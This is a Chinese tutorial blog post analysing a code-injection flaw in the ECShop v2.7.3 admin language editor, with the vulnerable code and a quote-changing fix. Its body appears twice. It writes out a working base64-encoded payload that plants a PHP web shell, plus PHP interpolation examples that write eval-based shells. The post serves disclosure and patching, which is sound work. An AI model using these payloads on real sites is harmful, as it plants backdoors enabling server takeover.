您现在的位置是:首页 > cms教程 > ecshop商城教程ecshop商城教程
ecshopv2.7.3注入漏洞原因分析和修复方法
雨寒2024-11-27 23:12:15ecshop商城教程已有人查阅
导读ECSHOP v2.7.3注入漏洞分析和修复测试版本漏洞条件漏洞利用产生原因修复方案1.测试版本v2.7.3 RELEASE 20121106(新)
ECSHOP v2.7.3注入漏洞分析和修复
测试版本
漏洞条件
漏洞利用
产生原因
修复方案1.测试版本
v2.7.3 RELEASE 20121106(新)
v2.7.3 RELEASE 201204112.漏洞条件
需登录到后台3.漏洞利用
1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”
为什么要搜索“用户信息”,还可以搜索其它的吗?
答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以
2) 添加如下后门,将用户信息改为
用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}
即生成一个JoyChou.php文件,内容为:
http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php
或
http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php
4.产生原因
在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
至于为什么可以执行?原理如下:
下面这三句话都可以执行,与其说代码执行,不如说参数执行。
了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号
修改\admin\edit_languages.php
注:这个注入漏洞很老,但一直存在。我从模板堂下载的ECShop较新版,就含有此漏洞。网站搭建在阿里云,提示服务器上ECShop有注入漏洞,查看后才发现。虽然我已经及时修复,但更多用户可能未曾留意或者没技术支持吧。
测试版本
漏洞条件
漏洞利用
产生原因
修复方案1.测试版本
v2.7.3 RELEASE 20121106(新)
v2.7.3 RELEASE 201204112.漏洞条件
需登录到后台3.漏洞利用
1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”
为什么要搜索“用户信息”,还可以搜索其它的吗?
答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以
2) 添加如下后门,将用户信息改为
用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}
即生成一个JoyChou.php文件,内容为:
<?php
assert(
$_POST[x]
);
?>
3) 访问user.php即可产生shell(不用注册登录账户)http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php
或
http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php
4.产生原因
在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
for ($i = 0; $i < count($_POST['item_id']); $i++)
{
/* 语言项内容如果为空,不修改 */
if (trim($_POST['item_content'][$i]) == '')
{
unset($src_items[$i]);
}
else
{
$_POST['item_content'][$i] = str_replace('\\\\n', '\\n', $_POST['item_content'][$i]);
/* $_POST['item_content'][$i]是修改后增加的内容,即增加的"用户信息${${fputs(fopen"等内容
$dst_items[$i] 是 $_LANG['label_profile'] = "用户信息${${fputs(fopen";
*/
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
}
}
修改完后文件\languages\zh_cn\user.php变量为:注意是双引号哦
$_LANG['label_profile'] = "用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}";
由于是双引号,所以只要在任意的php文件中引用这个变量,代码就会成功执行。至于为什么可以执行?原理如下:
下面这三句话都可以执行,与其说代码执行,不如说参数执行。
<?php
$a = "${ phpinfo()}"; // 有一个空格
$b = "{${phpinfo()}}"; // 多一对{},但是没有空格
$c = "{${fputs(fopen("JoyChou.php", "w+"), "<?php eval(\$_POST[1]);?>")}}";
$d = "asdf{${phpinfo()}}"; // {字符前可以随意加字符串
?>
而http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php这个文件包含\languages\zh_cn\user.php 这个文件,所以也可以代码执行。
/* 载入语言文件 */
require_once(ROOT_PATH . 'languages/' .$_CFG['lang']. '/user.php');
5.漏洞修复了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号
修改\admin\edit_languages.php
// 修复前
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
// 修复后,由于想在单引号之间出现单引号,必须使用转义。
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '\'' .$_POST['item_content'][$i]. '\';';
再次访问http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php已经不能生成JoyChou.php,代码没能得到执行。注:这个注入漏洞很老,但一直存在。我从模板堂下载的ECShop较新版,就含有此漏洞。网站搭建在阿里云,提示服务器上ECShop有注入漏洞,查看后才发现。虽然我已经及时修复,但更多用户可能未曾留意或者没技术支持吧。
本文标签:
很赞哦! ()
下一篇:ecshop安装环境和步骤方法
随机图文
ecshop后台设置模板排序让商品分类排序按数字大小排序
设置模板排序调用,从1开始;1、admin\includes\lib_template.php这样 cat_goods.lbi 里面能使用 $goods_cat.i 排序了 。ecshop支付宝电脑手机H5新版支付接口(自主开发不加密)
ECShop支付宝(Alipay)官方电脑手机H5新版支付接口说明文档,数据安全保障:在整个支付过程中,系统使用HTTPS加密协议传输订单信息,保障用户支付数据的安全性。有效防止数据泄露和恶意攻击,提高支付安全性。ecshop首页生成纯静态页的实现方法
代码号修改成ECSHOP首页生成纯静态页教程方法,ECSHOP默认没有生成静态功能,当您的网站访问量比较大,使用该插件即可把ecshop的网站的首页生成htmlecshop模板前台英文后台中文ecshop英文模板
很多做英文站的朋友 只想让前台显示为英文,后台依就保持中文。这个要如何来做呢? 网上也看到类似文章,好像还要进行目录与覆盖。
留言与评论 (共有 条评论) |